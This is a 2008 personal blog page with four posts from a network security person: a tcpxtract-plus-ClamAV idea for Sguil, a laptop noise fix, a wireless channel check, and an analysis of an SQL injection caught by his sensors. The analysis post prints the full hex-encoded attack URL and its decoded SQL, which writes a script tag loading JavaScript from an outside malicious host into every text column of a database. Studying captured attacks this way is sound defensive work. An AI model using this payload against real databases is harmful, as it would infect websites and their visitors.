09.27.08
Posted in OpenSourceSoftware at 7:47 pm by Edward Bjarte Fjellskål
I had this idea, that if tcpxtract can carve out files from your network traffic, it might be combined with ClamAV (clamscan) to check the files for viruses. This is probably done before, and all web-proxy servers that scans the web content does this in some way.
But my thought was to combine this with Sguil, so that the result would be reported to the F8 monkeys in a form such as:
$SRC_IP:$SRC_PORT -> $DST_IP:$DST_PORT : $FILE_TYPE, $VIRUS_TYPE
Clicking on the “Alert ID” will give one a transcript of the session, as usually or something…
tcpxtract has an output like this:
Found file of type “jpg” in session [81.31.233.9:20480 -> 78.156.13.199:29620], exporting to /tmp/tcpxtract/spool/00000048.jpg
In my PoC I then mv the files over to a check dir, and clamscan gives output like this:
# clamscan –no-summary /tmp/tcpxtract/check/
/tmp/tcpxtract/check/00000048.jpg: Eicar-Test-Signature FOUND
My plan was to correlate info from the two logfiles from clamscan and tcpxtract and then gather it in a 3rd logfile for a sguil_agent to pick up, and send to sguil.
My Prof of Concept (PoC) stops here, as tcpxtract does not run for very long on my Ubuntu Hardy test server, before it segfaults on my ass :/ I found two patches for tcpxtract, but I have not had time and strength (I’m rather sick at the moment) to check them out.
The story might continue…
Permalink
09.25.08
Posted in Information, OpenSourceSoftware, Ubuntu at 9:17 pm by Edward Bjarte Fjellskål
When I got my x61 laptop, I did not remember that it made this high pitch sound it now does. I believe that it came along with one of the Ubuntu Hardy kernel upgrades. The sound is only present when the machine is on battery power, and it was driving me crazy!
I Googled around, and found other referring to the same noise, though on other types of laptops. The problem seems to be, when max_cstate is at level C3 or higher. So I put it on C2.
You have to do this in the /etc/modprobe.d/options file, since you have to make a new initrd image, because this module is loaded from initrd at boot time.
Add options processor max_cstate=2 to /etc/modprobe.d/options and then update the initrd image (update-initramfs -u).
After you have rebooted, you can check the max_cstate in /proc/acpi/processor/CPU0/power too see that you are at the desired level.
And listen… no noise! 
Permalink
09.19.08
Posted in Information, OpenSourceSoftware, Security at 4:00 pm by Edward Bjarte Fjellskål
As an exercise for my self, and because I’m curious by nature… I had to find out what kind of Chinese attacks are hitting my sensors today. One thing is to see that its a SQLi attempt,*move on*, another one is to really see what they are trying to do. And by using Google, one can get an idea on the extent of such an attack. So here goes:
The URL that is triggering my sensors:
;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444
5434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612
C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746520
5B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2
D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444
5414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1
If you can decrypt the hex-string, just by looking at it, you are away ahead of me… If not, you are probably just normal, and perl could be a good friend:
# echo "0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061
2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233312
06F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275
D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687
474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020
5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
|perl -pe 's/(..)(..)/chr(hex($1)).chr(hex($2))/ge' | hexdump -C
Will give you something like this:
00 44 45 43 4c 41 52 45 20 40 54 20 76 61 72 63 |.DECLARE @T varc|
68 61 72 28 32 35 35 29 2c 40 43 20 76 61 72 63 |har(255),@C varc|
68 61 72 28 34 30 30 30 29 20 44 45 43 4c 41 52 |har(4000) DECLAR|
45 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 43 |E Table_Cursor C|
55 52 53 4f 52 20 46 4f 52 20 73 65 6c 65 63 74 |URSOR FOR select|
20 61 2e 6e 61 6d 65 2c 62 2e 6e 61 6d 65 20 66 | a.name,b.name f|
72 6f 6d 20 73 79 73 6f 62 6a 65 63 74 73 20 61 |rom sysobjects a|
2c 73 79 73 63 6f 6c 75 6d 6e 73 20 62 20 77 68 |,syscolumns b wh|
65 72 65 20 61 2e 69 64 3d 62 2e 69 64 20 61 6e |ere a.id=b.id an|
64 20 61 2e 78 74 79 70 65 3d 27 75 27 20 61 6e |d a.xtype=’u’ an|
64 20 28 62 2e 78 74 79 70 65 3d 39 39 20 6f 72 |d (b.xtype=99 or|
20 62 2e 78 74 79 70 65 3d 33 35 20 6f 72 20 62 | b.xtype=35 or b|
2e 78 74 79 70 65 3d 32 33 31 20 6f 72 20 62 2e |.xtype=231 or b.|
78 74 79 70 65 3d 31 36 37 29 20 4f 50 45 4e 20 |xtype=167) OPEN |
54 61 62 6c 65 5f 43 75 72 73 6f 72 20 46 45 54 |Table_Cursor FET|
43 48 20 4e 45 58 54 20 46 52 4f 4d 20 20 54 61 |CH NEXT FROM Ta|
62 6c 65 5f 43 75 72 73 6f 72 20 49 4e 54 4f 20 |ble_Cursor INTO |
40 54 2c 40 43 20 57 48 49 4c 45 28 40 40 46 45 |@T,@C WHILE(@@FE|
54 43 48 5f 53 54 41 54 55 53 3d 30 29 20 42 45 |TCH_STATUS=0) BE|
47 49 4e 20 65 78 65 63 28 27 75 70 64 61 74 65 |GIN exec(’update|
20 5b 27 2b 40 54 2b 27 5d 20 73 65 74 20 5b 27 | [’+@T+’] set [’|
2b 40 43 2b 27 5d 3d 27 27 22 3e 3c 2f 74 69 74 |+@C+’]='’”></tit|
6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 |le><script src=”|
68 74 74 70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 |http://www0.douh|
75 6e 71 6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e |unqn.cn/csrss/w.|
6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d |js”></script><!-|
2d 27 27 2b 5b 27 2b 40 43 2b 27 5d 20 77 68 65 |-'’+[’+@C+’] whe|
72 65 20 27 2b 40 43 2b 27 20 6e 6f 74 20 6c 69 |re ‘+@C+’ not li|
6b 65 20 27 27 25 22 3e 3c 2f 74 69 74 6c 65 3e |ke ‘’%”></title>|
3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 |<script src=”htt|
70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 75 6e 71 |p://www0.douhunq|
6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e 6a 73 22 |n.cn/csrss/w.js”|
3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 27 27 |></script><!–'’|
27 29 46 45 54 43 48 20 4e 45 58 54 20 46 52 4f |’)FETCH NEXT FRO|
4d 20 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 |M Table_Cursor |
49 4e 54 4f 20 40 54 2c 40 43 20 45 4e 44 20 43 |INTO @T,@C END C|
4c 4f 53 45 20 54 61 62 6c 65 5f 43 75 72 73 6f |LOSE Table_Curso|
72 20 44 45 41 4c 4c 4f 43 41 54 45 20 54 61 62 |r DEALLOCATE Tab|
6c 65 5f 43 75 72 73 6f 37 32 0a |le_Curso72.|
Which spells out two tings for me. First its the SQL command it self, which is cool 
Then we have the evil java script which it wants to effect those who surf you website!
http://www0.douhunqn.cn/csrss/w.js
Then, for the Google search of this specific attack:
http://www.google.no/search?hl=en&q="script+src%3Dhttp%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js"&btnG=Search
Which gives me 18,800 hits at the moment. Editing the search, makes things look even worse
I even see banks in the hits from Google
UPDATE: 5 Hours later - Google reports 19,700 Hits
UPDATE: 27 Hours later - Google reports 2,070 Hits
Permalink
09.18.08
Posted in Information, OpenSourceSoftware, Ubuntu at 9:15 pm by Edward Bjarte Fjellskål
I always seems to end up, at after some time, with a rather strange working wireless connection. A quick iwlist shows that I have 30 wireless neighbors within my range today…
# iwlist wlan0 scan|grep Channel:|wc -l
30
To take another quick look at what channels they are using, to get an idea on what channels to stay away from:
# iwlist wlan0 scan|grep Channel:| sort | uniq -c |sort -g
1 Channel:10
1 Channel:12
1 Channel:13
1 Channel:2
1 Channel:5
1 Channel:7
2 Channel:9
2 Channel:3
4 Channel:8
4 Channel:6
5 Channel:1
6 Channel:11
I see that today, Channel:4 is not in the air at all, and switches from Channel:1 and my life is back to normal.
So, again, know you wireless neighbors… you might feel a difference!
Permalink
